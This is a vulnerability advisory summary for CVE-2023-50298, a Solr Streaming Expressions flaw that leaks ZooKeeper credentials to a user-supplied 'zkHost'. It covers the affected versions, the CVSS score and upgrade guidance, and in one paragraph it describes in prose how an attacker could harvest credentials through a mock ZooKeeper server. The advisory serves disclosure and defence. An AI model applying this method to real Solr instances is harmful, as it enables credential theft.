CVE-2023-50298: 
Java vulnerability analysis and mitigation

CVE-2023-50298 is an Exposure of Sensitive Information vulnerability affecting Apache Solr versions from 6.0.0 through 8.11.2 and from 9.0.0 before 9.4.1. The vulnerability was discovered in early 2024 and publicly disclosed on February 8, 2024. The issue affects Apache Solr's Streaming Expressions functionality, which allows users to extract data from other Solr Clouds using a 'zkHost' parameter (Apache Security, NVD).

The vulnerability stems from Solr Streaming Expressions' handling of ZooKeeper credentials and ACLs. When a SolrCloud instance is configured with ZooKeeper credentials and ACLs, these credentials are sent to any 'zkHost' specified by users. The vulnerability is exposed through the '/streaming' handler, which operates with 'read' permissions. The severity is rated as HIGH with a CVSS v3.1 base score of 7.5 (Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N) (NVD).

An attacker could exploit this vulnerability by setting up a mock ZooKeeper server that accepts ZooKeeper requests with credentials and ACLs. By sending a streaming expression using the mock server's address in the 'zkHost' parameter, the attacker could extract sensitive ZooKeeper credentials and ACLs from the target Solr instance (Apache Security).

Users are recommended to upgrade to Apache Solr version 8.11.3 or 9.4.1, which fix the issue. In these patched versions, zkHost values will only use the given ZooKeeper credentials and ACLs when connecting to servers with the same server address, regardless of chroot (Apache Security).